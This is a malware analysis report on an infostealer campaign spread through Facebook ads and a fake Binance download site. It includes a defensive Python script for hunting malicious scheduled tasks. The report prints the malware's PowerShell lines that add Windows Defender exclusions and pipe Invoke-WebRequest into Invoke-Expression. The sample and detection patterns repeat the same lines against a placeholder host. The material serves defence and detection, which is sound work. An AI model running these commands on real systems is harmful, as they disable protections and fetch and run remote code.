Malware Disguised as A Cryptocurrency Exchange Being Distributed Through Facebook Ads
AhnLab SEcurity intelligence Center (ASEC) has identified malware being distributed through Facebook ads targeting cryptocurrency users. The identified malware is disguised as a specific cryptocurrency exchange to prompt users to install the malicious program. When users download a file from the disguised website, a file named “installer.msi” is saved and installed. During the installation process, the malware communicates with JavaScript code loaded on the disguised website, which ultimately executes an Infostealer that collects system information, screen captures, and browser information.

Figure 1. Fake advertisements
This post is based on a website disguised as Binance. When a user clicks the “Learn More” or “Download” button in the Facebook ad, they are redirected to the disguised website. However, if the user is not logged into Facebook or the URL does not contain parameters such as “utm_campaign, utm_content, cid, bid, fbclid, fbid,” they are redirected to an unrelated website. If the conditions are met and the user is redirected to the disguised website, they are prompted to download a malicious file by clicking the download button for Windows on the main screen.

Figure 2. Website disguised as Binance installation page
When the user clicks the button, a file named “installer.msi” is downloaded. Upon installing this file, a specific port (30303) on the local host is opened in the listening state. Afterward, the disguised website attempts to establish a connection with the system through this port and begins to communicate with it. Different commands are executed according to the parameters. The features of each parameter are shown in Table 1 below.
| Parameter | Function |
|---|---|
| /file | Downloads a file named installer.msi |
| /r | Query GUID in a specific registry |
| /w | Query system information using WMI queries |
| /worker | Scheduler response in XML format |
Table 1. Functions by Parameter

Figure 3. Part of the JavaScript code loaded on the fake website
When the GUID of the victim’s system, obtained through the “/r” parameter, is sent to the threat actor’s server, the server responds with a WMI query that retrieves system information. The victim’s PC receives this response and uses the WMI query to collect system information. It then uses the “/worker” parameter to send this information back to the threat actor’s server. If the victim’s system is a virtual environment, the server returns a NULL value and the communication ends. If the system is not a virtual environment, the server responds with an XML-formatted scheduler (scheduled task) definition that runs PowerShell.

Figure 4. (Top) When the scheduler is unresponsive (virtual environment) (Bottom) When the scheduler is responsive (non-virtual environment)
Once the scheduler (scheduled task) is registered, events in the “Application” log trigger the execution of a Base64-encoded PowerShell script. The following table details the executed scripts.
| ID | Script | Description |
|---|---|---|
| 1 | `Add-MpPreference -ExclusionProcess (Get-Process -PID $PID).MainModule.ModuleName -Force` | Adds the PowerShell process to the Windows Defender scan exclusions |
| 2 | `Add-MpPreference -ExclusionPath (Get-Location) -Force` | Adds the script path executed by PowerShell to the Windows Defender scan exclusions |
| 3 | `Invoke-WebRequest -UseBasicParsing Domain?OSSoftwareInstallerLegacy \| Invoke-Expression` | Downloads and executes additional scripts from a specific domain |
| 4 | `Invoke-WebRequest -UseBasicParsing Domain?OSSoftwareInstallerLegacy \| Invoke-Expression` | Downloads and executes additional scripts from a specific domain |
Table 2. Features of each script

Figure 5. Registered scheduler
When the script in either step 3 or 4 of Table 2 is executed, an additional PowerShell script is downloaded and executed from an external source. The downloaded script then downloads and executes additional scripts from an external source, as shown in Figure 6.

Figure 6. PowerShell script downloading additional scripts
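To hunt for the persistence described above (a scheduled task with an “Application” log event trigger whose action runs Base64-encoded PowerShell that adds Defender exclusions and pipes Invoke-WebRequest into Invoke-Expression), the following added example, which is not from the report or from AhnLab, parses an exported Task Scheduler XML definition, decodes the -EncodedCommand argument (UTF-16LE in Base64) and flags the Table 2 behaviours. The task XML it analyzes is constructed for illustration; the pattern names and the placeholder URL are assumptions.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Namespace used by Windows Task Scheduler task definitions (exported task XML).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Behaviours taken from the scripts in Table 2 of the report.
INDICATORS = [
    ("defender-exclusion", re.compile(r"Add-MpPreference\s+-Exclusion(?:Process|Path)\b", re.I)),
    ("download-and-execute", re.compile(r"Invoke-WebRequest\b[^|\n]*\|\s*(?:Invoke-Expression|iex)\b", re.I)),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(arguments: str):
    """Decode a -EncodedCommand value (base64 of UTF-16LE text); None if absent or malformed."""
    m = ENCODED_ARG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_task_xml(xml_text: str) -> dict:
    """Report an Application-log EventTrigger and Table 2 behaviours in decoded PowerShell actions."""
    root = ET.fromstring(xml_text)
    report = {"application_log_trigger": False, "indicators": [], "scripts": []}
    for sub in root.findall(".//t:EventTrigger/t:Subscription", NS):
        if re.search(r'Path="Application"', sub.text or ""):
            report["application_log_trigger"] = True
    for action in root.findall(".//t:Exec", NS):
        if "powershell" not in action.findtext("t:Command", default="", namespaces=NS).lower():
            continue
        script = decode_encoded_command(action.findtext("t:Arguments", default="", namespaces=NS))
        if script is None:
            continue
        report["scripts"].append(script)
        report["indicators"] += [n for n, p in INDICATORS if p.search(script) and n not in report["indicators"]]
    report["suspicious"] = report["application_log_trigger"] and bool(report["indicators"])
    return report

# Constructed sample (not from the report): Application-log trigger running an encoded script like Table 2.
SAMPLE_SCRIPT = ("Add-MpPreference -ExclusionPath (Get-Location) -Force; "
                 "Invoke-WebRequest -UseBasicParsing http://placeholder.invalid/?x | Invoke-Expression")
ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
SAMPLE_TASK_XML = f"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><EventTrigger><Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription></EventTrigger></Triggers>
  <Actions><Exec><Command>powershell.exe</Command>
    <Arguments>-NoP -W Hidden -EncodedCommand {ENCODED}</Arguments></Exec></Actions>
</Task>"""
```

Running `analyze_task_xml` over tasks exported with `Export-ScheduledTask` (or collected by an EDR) surfaces the same trigger-plus-script combination without relying on a specific domain, which the report shows changes between samples.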
This attack targets users interested in cryptocurrency and is distributed through advertisements. The attack has been covered by Bitdefender and WithSecure, two global security companies. The malware ultimately executed collects browser and Telegram information and performs various malicious behaviors such as keylogging. Users are advised to check the domain of the website when downloading files to ensure that it is the official website. Most files distributed through advertisements are potentially unwanted programs (PUPs) or malware, so users should avoid downloading them.